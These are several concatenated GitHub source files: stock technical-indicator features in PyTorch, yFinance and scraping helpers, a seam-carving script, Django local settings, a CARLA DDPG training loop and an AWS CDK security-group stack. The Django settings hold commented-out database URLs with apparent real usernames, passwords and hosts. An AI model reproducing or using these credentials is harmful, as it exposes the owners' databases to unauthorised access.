past_vol = torch.roll(vol,7,0)\n past_vol[:7] = np.nan\n vol_delta = vol - past_vol\n vol_delta = torch.nan_to_num(vol_delta, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,0] = vol_delta.squeeze()\n\n volume_growth = extend(torch.diff(torch.log(impute(volume)),dim=0), num_days, blank=0)\n volume_growth[volume.isnan()] = np.nan\n volume_growth = torch.clip(volume_growth, -3, 3)\n tensor_vol[:,:,1] = volume_growth.squeeze()\n\n high_low_unbalance = high / low - 1\n high_low_unbalance = torch.clip(high_low_unbalance, 0, 3)\n tensor_vol[:,:,2] = high_low_unbalance.squeeze()\n\n for f in range(4):\n\n window_size = 7 * 2**f\n\n # ROLLING\n\n returns_windows = returns.unfold(0,window_size,1)\n close_windows = close.unfold(0,window_size,1)\n high_windows = high.unfold(0,window_size,1)\n low_windows = low.unfold(0,window_size,1)\n volume_growth_windows = volume_growth.unfold(0,window_size,1)\n\n rolling_close_means = extend(torch_nanmean(close_windows,dim=-1), num_days)\n rolling_close_stds = extend(torch_nanstd(close_windows,dim=-1), num_days)\n rolling_close_max = extend(torch_nanmax(close_windows, dim=-1), num_days)\n rolling_high_max = extend(torch_nanmax(high_windows, dim=-1), num_days)\n rolling_low_min = extend(torch_nanmin(low_windows, dim=-1), num_days)\n\n # returns moving avg\n rolling_returns_means = torch_nanmean(returns_windows, dim=-1)\n rolling_returns_means = extend(rolling_returns_means, num_days)\n rolling_returns_means = torch.nan_to_num(rolling_returns_means, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+f] = rolling_returns_means.squeeze()\n\n # last x days max return\n rolling_returns_max = torch_nanmax(returns_windows, dim=-1)\n rolling_returns_max = extend(rolling_returns_max, num_days)\n rolling_returns_max = impute_with_medians(rolling_returns_max)\n tensor_ret[:,:,3+4+f] = rolling_returns_max.squeeze()\n\n # last x days volatility\n rolling_returns_stds = torch_nanstd(returns_windows, dim=-1)\n rolling_returns_stds = extend(rolling_returns_stds, num_days)\n rolling_returns_stds = impute_with_medians(rolling_returns_stds)\n tensor_vol[:,:,3+f] = rolling_returns_stds.squeeze()\n\n # last x days volume growth mean\n rolling_volume_growth_means = torch_nanmean(volume_growth_windows, dim=-1)\n rolling_volume_growth_means = extend(rolling_volume_growth_means, num_days)\n rolling_volume_growth_means = torch.clip(rolling_volume_growth_means, -1, 1)\n rolling_volume_growth_means = torch.nan_to_num(rolling_volume_growth_means, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+4+f] = rolling_volume_growth_means.squeeze()\n\n\n # VOLATILITY\n\n # Average True Range: https://www.investopedia.com/terms/a/atr.asp #Keltner Channel\n TR = torch.topk(torch.cat((high - low, torch.abs(high - prev_close), torch.abs(low - prev_close)), dim=-1), dim=-1, k=1)[0]\n TR_windows = TR.unfold(0,window_size,1)\n ATR = torch_nanmean(TR_windows, dim=-1)\n ATR = extend(ATR, num_days)\n deviation_ATR = (close - rolling_close_means) / ATR\n deviation_ATR = torch.clip(deviation_ATR, -10, 10)\n deviation_ATR = torch.nan_to_num(deviation_ATR, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+8+f] = deviation_ATR.squeeze()\n\n # Bollinger Band: https://www.investopedia.com/terms/b/bollingerbands.asp\n deviation_bollinger = (close - rolling_close_means) / rolling_close_stds\n deviation_bollinger = torch.clip(deviation_bollinger, -5, 5)\n deviation_bollinger = torch.nan_to_num(deviation_bollinger, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+12+f] = deviation_bollinger.squeeze()\n\n # Donchian Channels: 
https://www.investopedia.com/terms/d/donchianchannels.asp\n middle_channel = (rolling_high_max + rolling_low_min) / 2\n deviation_donchian = close / middle_channel - 1\n deviation_donchian = torch.clip(deviation_donchian, -5, 5)\n deviation_donchian = torch.nan_to_num(deviation_donchian, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+16+f] = deviation_donchian.squeeze()\n\n # Ulcer Index: https://www.investopedia.com/terms/u/ulcerindex.asp\n R = 100 * (close - rolling_close_max) / rolling_close_max\n R2_windows = torch.pow(R,2).unfold(0,window_size,1)\n ulcer_index = torch.sqrt(torch_nansum(R2_windows, dim=-1) / (~R2_windows.isnan()).sum(dim=-1))\n ulcer_index = torch.clip(ulcer_index, 0, 50)\n ulcer_index = impute_with_medians(extend(ulcer_index, num_days))\n tensor_vol[:,:,3+20+f] = ulcer_index.squeeze()\n\n\n # VOLUME\n\n # Money Flow Index: https://www.investopedia.com/terms/m/mfi.asp\n exec_cap_pos_windows = torch.where(returns > 0, exec_cap, zeros).unfold(0,window_size,1)\n exec_cap_neg_windows = torch.where(returns < 0, exec_cap, zeros).unfold(0,window_size,1)\n money_flow_pos = torch_nansum(exec_cap_pos_windows, dim=-1)\n money_flow_neg = torch_nansum(exec_cap_neg_windows, dim=-1)\n MFI = money_flow_pos / (money_flow_pos + money_flow_neg) - 0.5\n MFI = torch.nan_to_num(extend(MFI, num_days), nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+24+f] = MFI.squeeze()\n\n # Chaikin Oscillator: https://www.investopedia.com/terms/c/chaikinoscillator.asp #Accumulation/Distribution Indicator\n mfv = volume * ((close - low) - (high - close)) / (high - low)\n mfv_slow = torch_nanmean(mfv.unfold(0,window_size,1), dim=-1)\n CO = mfv / extend(mfv_slow, num_days) - 1\n CO = torch.clip(CO, -100, 100)\n CO = torch.nan_to_num(CO, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+28+f] = CO.squeeze()\n\n # On-Balance Volume: https://www.investopedia.com/terms/o/onbalancevolume.asp\n obv = torch.where(returns > 0, volume, zeros) - torch.where(returns < 0, volume, zeros)\n obv_slow = torch_nanmean(obv.unfold(0,window_size,1), dim=-1)\n OBV = obv / extend(obv_slow, num_days) - 1\n OBV = torch.clip(OBV, -100, 100)\n OBV = torch.nan_to_num(OBV, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+32+f] = OBV.squeeze()\n\n # Force Index: https://www.investopedia.com/terms/f/force-index.asp\n fi = volume * (close - prev_close)\n fi_slow = torch_nanmean(fi.unfold(0,window_size,1), dim=-1)\n FI = fi / extend(fi_slow, num_days) - 1\n FI = torch.clip(FI, -100, 100)\n FI = torch.nan_to_num(FI, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+36+f] = FI.squeeze()\n\n\n # TREND\n\n # Average Directional Index: https://www.investopedia.com/terms/a/adx.asp\n dm_pos = high - prev_high\n dm_neg = prev_low - low\n smooth_dm_pos = torch_nanmean(dm_pos.unfold(0,window_size,1), dim=-1)\n smooth_dm_neg = torch_nanmean(dm_neg.unfold(0,window_size,1), dim=-1)\n di_pos = extend(smooth_dm_pos, num_days) / ATR\n di_neg = extend(smooth_dm_neg, num_days) / ATR\n DX = (di_pos - di_neg) / (di_pos + di_neg)\n DX_windows = DX.unfold(0,window_size,1)\n ADX = torch_nanmean(DX_windows, dim=-1)\n ADX = extend(ADX, num_days)\n ADX = torch.clip(ADX, -100, 100)\n ADX = torch.nan_to_num(ADX, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+8+f] = ADX.squeeze()\n\n # Vortex Indicator: https://www.investopedia.com/terms/v/vortex-indicator-vi.asp\n vm_pos = torch.abs(high - prev_low)\n vm_neg = torch.abs(low - prev_high)\n sum_vm_pos = torch_nansum(vm_pos.unfold(0,window_size,1), dim=-1)\n sum_vm_neg = torch_nansum(vm_neg.unfold(0,window_size,1), dim=-1)\n VI = 
sum_vm_pos / sum_vm_neg - 1\n VI = extend(VI, num_days)\n VI = torch.clip(VI, -1, 5)\n VI = torch.nan_to_num(VI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+12+f] = VI.squeeze()\n\n # Mass Index: https://www.investopedia.com/terms/m/mass-index.asp\n high_low_diff = high - low\n high_low_diff_slow = torch_nanmean(high_low_diff.unfold(0,window_size,1), dim=-1)\n high_low_diff_fast = torch_nanmean(high_low_diff.unfold(0,window_size//3,1), dim=-1)\n MI = extend(high_low_diff_fast, num_days) / extend(high_low_diff_slow, num_days) - 1\n MI = extend(MI, num_days)\n MI = torch.clip(MI, -1, 1.5)\n MI = torch.nan_to_num(MI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+16+f] = MI.squeeze()\n\n\n # MOMENTUM\n\n # Relative Strength Index: https://www.investopedia.com/terms/r/rsi.asp\n returns_pos_windows = torch.where(returns > 0, returns, zeros).unfold(0,window_size,1)\n returns_neg_windows = torch.where(returns < 0, returns, zeros).unfold(0,window_size,1)\n returns_pos_mean = torch_nanmean(returns_pos_windows, dim=-1)\n returns_neg_mean = torch_nanmean(returns_neg_windows, dim=-1)\n RSI = returns_pos_mean / (returns_pos_mean + returns_neg_mean) - 0.5\n RSI = extend(RSI, num_days)\n RSI = torch.clip(RSI, -100, 100)\n RSI = torch.nan_to_num(RSI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+20+f] = RSI.squeeze()\n\n # Stochastic RSI: https://www.investopedia.com/terms/s/stochrsi.asp\n RSI_windows = RSI.unfold(0,window_size,1)\n RSI_min = extend(torch_nanmin(RSI_windows, dim=-1), num_days)\n RSI_max = extend(torch_nanmax(RSI_windows, dim=-1), num_days)\n SRSI = (RSI - RSI_min) / (RSI_max - RSI_min) - 0.5\n SRSI = torch.nan_to_num(SRSI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+24+f] = SRSI.squeeze()\n\n # True Strength Index: https://www.investopedia.com/terms/t/tsi.asp\n pc_windows = (close - prev_close).unfold(0,window_size,1)\n price_change = extend(torch_nanmean(pc_windows, dim=-1), num_days)\n price_change_abs = extend(torch_nanmean(torch.abs(pc_windows), dim=-1), num_days)\n TSI = price_change / price_change_abs\n TSI = torch.nan_to_num(TSI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+28+f] = TSI.squeeze()\n\n # Ultimate Oscillator: https://www.investopedia.com/terms/u/ultimateoscillator.asp\n buying_pressure = close - torch.min(low, prev_close)\n true_high = torch.max(high, prev_close) - torch.min(low, prev_close)\n buying_pressure_windows = buying_pressure.unfold(0,window_size,1)\n true_high_windows = true_high.unfold(0,window_size,1)\n UAV = torch_nansum(buying_pressure_windows, dim=-1) / torch_nansum(true_high_windows, dim=-1) - 0.5\n UAV = torch.nan_to_num(extend(UAV, num_days), nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+32+f] = UAV.squeeze()\n\n # Stochastic Oscillator: https://www.investopedia.com/terms/s/stochasticoscillator.asp\n SO = (close - rolling_low_min) / (rolling_high_max - rolling_low_min) - 0.5\n SO = torch.nan_to_num(SO, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+36+f] = SO.squeeze()\n\n tensor_ret[:,:,:3] = torch.nan_to_num(tensor_ret[:,:,:3], nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,:3] = torch.nan_to_num(tensor_vol[:,:,:3], nan=0, posinf=0, neginf=0)\n\n return tensor_ret, tensor_vol\n\n def train_dataloader(self):\n\n return DataLoader(self.train_ds, batch_size=self.batch_size, shuffle=True, drop_last=True)\n\n def val_dataloader(self):\n\n return DataLoader(self.val_ds, batch_size=self.batch_size, shuffle=False, drop_last=True)\n\n def all_dataloader(self):\n\n return DataLoader(self.all_ds, batch_size=100, shuffle=False)\n\n\nclass JpxDataSet(Dataset):\n 
\n def __init__(self, x, y, w):\n\n super(JpxDataSet, self).__init__()\n\n self.x = x\n self.y = y\n self.w = w\n\n def __len__(self):\n\n return len(self.x)\n\n def __getitem__(self, idx):\n\n return self.x[idx], self.y[idx], self.w[idx]\n\n\n\nif __name__ == '__main__':\n\n data = JPXdataModule()\n\n\n\n\n","repo_name":"codefluence/trading","sub_path":"jpx/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":47294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8285963968","text":"from datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\nimport requests\nimport time\nimport json\nimport glob\nimport os\nimport re\n\n\ndef github_repo_files(repo_url, ext='.csv'):\n '''\n Get the max date of files in a github repository.\n Parameters:\n repo (url): full repository url containing data files\n ext (str): filename extension to search\n Returns:\n dictionary of valid data urls and the max date \n\n '''\n ext = ext.lower() # make lowercase\n\n regex_url = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n # check if valid url\n if not(re.match(regex_url, repo_url) is None):\n raw_url = repo_url.replace('https://github.com/', 'https://raw.githubusercontent.com/').replace('tree/', '')\n \n # make request\n r = requests.get(repo_url)\n if r.status_code==200:\n soup = BeautifulSoup(r.text, 'html.parser')\n github_data_files = [a.text for a in soup.find_all('a') if ext in a.text]\n if len(github_data_files)>0:\n github_data_urls = [os.path.join(raw_url, f) for f in github_data_files]\n max_file_date = str(max([int(f.split('_')[-1].split('.')[-2]) for f in github_data_files]))\n max_date = (datetime.strptime(max_file_date, '%Y%m%d')).strftime('%Y-%m-%d')\n \n return {'github_data_urls':github_data_urls, 'max_date':max_date}\n \n else:\n raise Exception(f'No files with {ext} in {repo_url}')\n else:\n raise Exception(f'Invalid URL 400 Bad Request: {repo_url}')\n else:\n raise Exception(f'MissingSchema: {repo_url}')\n\n\ndef get_yf_data(list_of_symbols, yf=None, interval='1d', start_date=None, end_date=None, verbose=False, sleep=0):\n '''\n Get stock data using yFinance.\n Parameters:\n yf (obj): yf library\n list_of_symbols (list): list of symbols/tickers\n interval (str): defaults to 1 day, Valid intervals: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo\n interval (str): default to None, interval selection cutoff\n start_date (str): defaults to None, 'YYYY-MM-DDDD'\n end_date (str): defaults to None, 'YYYY-MM-DDDD'\n verbose (bool): show symbol output\n sleep (int): time between symbol request\n Returns:\n dataframe of entererd symbols\n '''\n\n if type(list_of_symbols)!=list:\n raise Exception(f'Invalid data type for list_of_symbols: {type(list_of_symbols)}')\n\n if yf is None:\n raise Exception(f'yfinance object yf is None, import yfinance as yf')\n\n dfs_list = []\n cnt = 1\n for s in list_of_symbols:\n if verbose:\n print(f'{cnt}/{len(list_of_symbols)} {s}')\n cnt += 1\n ticker = yf.Ticker(s)\n df_ticker = ticker.history(period='max', interval=interval, start=start_date, end=end_date).reset_index()\n df_ticker.insert(1, 'Symbol', s)\n dfs_list.append(df_ticker)\n time.sleep(sleep)\n\n df = 
pd.concat(dfs_list, sort=False)\n \n return df\n\ndef export_data(df_results, filename, export_path=None):\n '''\n Export results as csv to data folder.\n '''\n # check dates\n min_date = datetime.strftime(df_results['Date'].min(), '%Y%m%d')\n max_date = datetime.strftime(df_results['Date'].max(), '%Y%m%d')\n \n filename_ = f\"{filename}_{min_date}_{max_date}.csv\"\n\n try:\n df_results.to_csv(os.path.join(export_path, filename_), index=False)\n except:\n print(f'Invalid export_path {export_path}, exporting to current directory {os.getcwd()}')\n df_results.to_csv(filename_, index=False)\n\n print(filename_)\n\ndef symbols_dict(create_new=True, path_to_files=None, export_json=True):\n '''\n Create a dictionary object of csv file containing symbol data.\n Parameters:\n create_new (bool): create new dictionary from csv files otherwise, import previous if exist\n path_to_files (str): path with csv symbols, defaults to None\n export_json (bool): export dictionary as .json, defaults to True\n '''\n json_filename = 'symbols.json'\n\n if path_to_files is None:\n raise Exception(f'Invalid path_to_files {path_to_files}')\n\n if create_new:\n dict_ = dict()\n for f in glob.glob(os.path.join(path_to_files, '*csv')):\n filename = os.path.split(f)[-1].split('.')[0]\n dict_[filename] = dict()\n df = pd.read_csv(f)\n for s in df['symbol']:\n dict_[filename][s] = dict()\n for c in df.columns[1:]:\n dict_[filename][s][c] = df[df['symbol']==s][c].values[0]\n\n if export_json:\n with open(os.path.join(path_to_files, json_filename), 'w') as fp:\n json.dump(dict_, fp)\n\n else:\n print(f'Importing previous {json_filename} file')\n if json_filename in os.listdir(path_to_files):\n with open(os.path.join(path_to_files, json_filename)) as fp:\n dict_ = json.load(fp) \n else:\n raise Exception(f'No such file or directory {os.path.join(ASSETS_PATH, json_filename)}')\n\n return dict_","repo_name":"Carmelo94/Stocks","sub_path":"utils/hlpr.py","file_name":"hlpr.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72310842887","text":"import sys\n\nimport cv2 as cv \nimport numpy as np\nfrom scipy import ndimage \nimport seam_carving as s\nfrom PIL import Image\n\n\ndef loadimage(filename):\n img = cv.imread(cv.samples.findFile(filename))\n #RGB_img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n return img #RGB_img\n\ndef obj_remove(img , mask_f):\n src = np.array(img)\n mask = mask_f #np.array(Image.open(mask_f).convert('L'))\n new_img = s.remove_object(src, drop_mask=mask, keep_mask=None)\n return new_img\n\ndef energy(img):\n src = np.array(img)\n h, w, c = src.shape\n backward = s.resize(src, (w - 200, h))\n forward = s.resize(src, (w - 200, h), energy_mode='forward')\n return backward , forward\n\nif __name__ == '__main__':\n\n if not len(sys.argv) == 5:\n print(\"Wrong input\")\n exit()\n \n OriginalImg = loadimage(sys.argv[1])\n\n if sys.argv[2] == \"energy\":\n new_im1 , new_im2 = energy(OriginalImg)\n cv.imwrite(sys.argv[3], new_im1)\n cv.imwrite(sys.argv[4], new_im2)\n\n elif sys.argv[2] == \"remove\":\n mask = np.array(Image.open(sys.argv[3]).convert('L'))\n new_im = obj_remove(OriginalImg , mask)\n cv.imwrite(sys.argv[4], new_im)\n else:\n print(\"Check your inputs arguments please\")\n\n 
\n","repo_name":"Atheeri/Seam-Carving_Computer_Vision","sub_path":"seam_carving_parts_3_and_4.py","file_name":"seam_carving_parts_3_and_4.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"35847798204","text":"__author__ = 'aleksey'\n\nimport os\nimport dj_database_url\n\nDEBUG = True\nTEMPLATE_DEBUG = True\nSQL_DEBUG = True\n\n# location = lambda x: os.path.join(\n# os.path.dirname(os.path.realpath(__file__)), x)\n\n# DATABASES = {'default': dj_database_url.config(default='postgres://homeoptik:kBcwGP@185.58.204.167:5432/homeoptik_db')}\n# Use a Sqlite database by default\n# DATABASES = {'default': dj_database_url.config(default='postgres://kbnzibvwndmgwt:5kFa SFUdgzkGpJrVwZSuVMarim@ec2-54-243-149-147.compute-1.amazonaws.com:5432/dehb58j6jcp7tg')}\n\n# DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'\n\n# LOG_ROOT = location('logs')\n\n# COMPRESS_ENABLED = False\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n }\n}","repo_name":"aleksey-zhigulin/homeoptik","sub_path":"homeoptik/settings_local.py","file_name":"settings_local.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"1300526231","text":"from __future__ import print_function\nfrom fpdf import FPDF\nimport sys\nimport json\nimport time\nimport re\n\nclass PDF(FPDF):\n def header(self):\n # Logo\n self.image('fhir.png', 10, 8, 33)\n # Arial bold 15\n self.set_font('Arial', 'IB', 16)\n # Set the color of text \n self.set_text_color(65, 105, 225)\n # Move to the right\n self.cell(70)\n # Title\n self.cell(30, 8, 'Observation Report', 0, 0, 'C')\n # Current time of generated file\n self.cell(50)\n localtime = time.asctime(time.localtime(time.time()))\n currentTime = localtime\n self.cell(30,8,currentTime,0,2,'C')\n # Line break\n self.ln(10)\n\n # Page footer\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('Arial', 'IB', 8)\n # Text color in gray\n self.set_text_color(65, 105, 225)\n # Page number\n self.cell(0, 10, 'Page ' + str(self.page_no()), 0, 0, 'C')\n\nif __name__ == '__main__':\n i = \"\"\n pdf = PDF()\n pdf.alias_nb_pages()\n pdf.add_page()\n pdf.set_font('Arial','',10)\n\n time.sleep(2)\n\n print(\"Get the stdin data\")\n l = sys.stdin.readlines()\n print(type(l))\n for k in l:\n i = i + k\n # string -> json dictionary\n param_json = json.loads(i)\n\n def getID():\n if 'id' in param_json:\n return param_json['id']\n \n def getDateTime():\n if 'effectiveDateTime' in param_json:\n return param_json['effectiveDateTime']\n else:\n return ''\n\n def getIssued():\n if 'issued' in param_json:\n return param_json['issued']\n else:\n return ''\n\n def getCode():\n if 'code' in param_json:\n code = param_json['code']\n if 'text' in code:\n return code['text']\n else:\n return ''\n else:\n return ''\n \n def getValue():\n result = ''\n value = ''\n unit = ''\n if 'valueQuantity' in param_json:\n quantity = param_json['valueQuantity']\n if 'value' in quantity:\n value = quantity['value']\n if 'unit' in quantity:\n unit = quantity['unit']\n result = str(value) + ' ' + unit\n return result\n else:\n return result\n \n def getUpdate():\n if 'meta' in param_json:\n meta = param_json['meta']\n if 'lastUpdated' in meta:\n return meta['lastUpdated']\n else:\n return ''\n else:\n return ''\n \n def getVersion():\n 
if 'meta' in param_json:\n meta = param_json['meta']\n if 'versionId' in meta:\n return str(meta['versionId'])\n else:\n return ''\n else:\n return ''\n \n def getReference():\n if 'subject' in param_json:\n subject = param_json['subject']\n if 'reference' in subject:\n return subject['reference']\n else:\n return ''\n else:\n return ''\n \n def drawObservation():\n pdf.set_font('Arial','B',10)\n pdf.set_text_color(65, 105, 225)\n pdf.cell(30,8,getCode()+': '+getValue(),0,0,'L')\n \n def setDefault():\n pdf.set_font('Arial','',10)\n pdf.set_text_color(0,0,0)\n \n def pageContent():\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Last updated:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getUpdate(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Report version:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getVersion(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Observation ID:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getID(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Reference ID:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getReference(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Date Time:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getDateTime(), 0, 1, 'L')\n\n pdf.set_font('Arial','B',10)\n pdf.cell(30, 8, 'Issued Time:', 0, 0, 'L')\n setDefault()\n pdf.cell(5)\n pdf.cell(30, 8, getIssued(), 0, 1, 'L')\n\n drawObservation()\n setDefault()\n pdf.cell(50)\n \n pageContent()\n print('Observation File Generation complete!')\n pdf.output(\"observation.pdf\",'F')","repo_name":"yifanzhang13/GOSH-FHIRworks2020-PDFer","sub_path":"dotnet-azure-fhir-web-api/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21280859190","text":"#!/usr/bin/env python3\nimport glob\nimport os\nimport random\nimport sys\n\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\nimport datetime\nfrom Env import CarEnv\nfrom Agent.DDPG import DDPGAgent\nfrom Utils.Util import abstract_data_numpy\nfrom config import ddpg_setting\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ntry:\n sys.path.append(glob.glob('E:/carla/CARLA_0.9.11/WindowsNoEditor/PythonAPI/carla/dist/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\n\n\nEPISODES = ddpg_setting.EPISODES\nINTERVAL_NUM = ddpg_setting.INTERVAL_NUM\nWIDTH = ddpg_setting.WIDTH\nHEIGHT = ddpg_setting.HEIGHT\n\nSIGMA_DECAY = ddpg_setting.SIGMA_DECAY\nMIN_SIGMA = ddpg_setting.MIN_SIGMA\ndef train_ddpg(episodes=EPISODES,\n interval_num=INTERVAL_NUM,\n abstract_train=False,\n txtname=\"ddpg_train\",\n start_location=\"default\",\n sigma=ddpg_setting.SIGMA):\n random.seed(1)\n np.random.seed(2)\n\n # 删除历史训练记录\n if os.path.exists(txtname):\n os.remove(txtname)\n\n # 创建权重保存文件夹\n dt = datetime.datetime.now()\n save_path = \"./trained_model/save\" + \"%s-%s-%s-%s-%s-%s\" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)\n os.makedirs(save_path)\n\n agent = DDPGAgent()\n env = CarEnv(im_width=WIDTH, im_height=HEIGHT, startlocation=start_location, action_type=\"continuous\", reward_type=ddpg_setting.reward_type)\n\n for episode in tqdm(range(1, episodes + 1), unit='episodes'):\n episode_reward = 0.0 # 当前轮次的累计reward\n current_state = 
env.reset() # 像素在0-255之间\n current_state = current_state.astype(np.float32) / 255\n if abstract_train:\n current_state = abstract_data_numpy(current_state,interval_num=interval_num) # (channel, 2 * height, width)\n # 将(height, width, channel)转换为(channel, height, width)\n current_state = current_state.transpose((2, 0, 1))\n\n while True:\n action = agent.get_next_action(current_state, sigma=sigma, disturbance=True)\n # print(\"action\", action)\n new_state, reward, done, _ = env.step(action)\n new_state = new_state.astype(np.float32) / 255\n if abstract_train:\n new_state = abstract_data_numpy(new_state, interval_num=interval_num)\n new_state = new_state.transpose((2, 0, 1))\n episode_reward += reward\n # if reward >= -0.99 or done is True: # 车静止时返回-1并且done=false,静止时不计入经验\n agent.update_replay_memory((current_state, action, reward, new_state, done))\n current_state = new_state\n if done:\n print(\"episode %d, episode_reward %f, sigma %f\" % (episode, episode_reward, sigma))\n break\n\n with open(txtname, 'a') as f:\n f.write(\"episode %d, episode_reward %f, sigma %f\\n\" % (episode, episode_reward, sigma))\n\n agent.train_in_loop(train_time=ddpg_setting.TRAIN_TIME)\n # 每100次保存权重\n if episode % 50 == 0:\n torch.save(obj=agent.model_action.state_dict(),\n f=save_path + \"/ddpg_action_\" + \"%depoch.pth\" % (episode,))\n torch.save(obj=agent.model_value.state_dict(),\n f=save_path + \"/ddpg_value_\" + \"%depoch.pth\" % (episode,))\n\n sigma = max(MIN_SIGMA, sigma * SIGMA_DECAY)\n\nif __name__ == '__main__':\n train_ddpg(abstract_train=True,\n txtname=\"ddpg_train_pointdefault2_abstract.txt\",\n start_location=\"default2\")\n\n\n\n","repo_name":"DajiaLi/my_torch_carla","sub_path":"ddpg_train.py","file_name":"ddpg_train.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17766742719","text":"import this\nfrom aws_cdk import (\n # Duration,\n Stack,\n \n Duration,\n RemovalPolicy,\n Stack,\n CfnOutput,\n aws_cloudformation as cfn,\n aws_ec2 as ec2,\n aws_ssm as ssm,\n aws_kms as kms,\n aws_backup as backup,\n aws_events as events,\n aws_iam as iam\n \n # aws_sqs as sqs,\n)\nfrom constructs import Construct\nfrom aws_cdk import NestedStack\nimport aws_cdk as cdk\nfrom cdk_ec2_key_pair import KeyPair\n \nclass mgmtserver(cdk.NestedStack):\n\n def __init__(self, scope: Construct, construct_id: str,vpc2:ec2.Vpc, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n ##### Parameters ##########\n myenvironment=self.node.try_get_context(\"myenvironment\")\n SecurityGp=myenvironment.get(\"SecurityGp\")\n mgsg_id=SecurityGp.get(\"mgsg_id\")\n mgsg_name=SecurityGp.get(\"mgsg_name\")\n mgsg_peer= SecurityGp.get(\"mgsg_peer\")\n ### AMI ####\n amzn_windows = ec2.MachineImage.latest_windows(\n ec2.WindowsVersion.WINDOWS_SERVER_2019_ENGLISH_FULL_BASE\n )\n ### Role ####\n role1= iam.Role(self,\"keyrole1\",\n assumed_by=iam.ServicePrincipal(\"ec2.amazonaws.com\"),\n )\n role1.add_managed_policy(\n iam.ManagedPolicy.from_aws_managed_policy_name\n (\"AmazonSSMManagedInstanceCore\")\n )\n ###add this role AmazonS3ReadOnlyAccess\n self.MgmtSG=ec2.SecurityGroup(self,mgsg_id,\n vpc= vpc2,\n description=\"MgmtSecurityGp\",\n allow_all_outbound=True,\n security_group_name=mgsg_name)\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(22),\n \"SSH Connecton\")\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(3389),\n \"SSH Connecton\")\n 
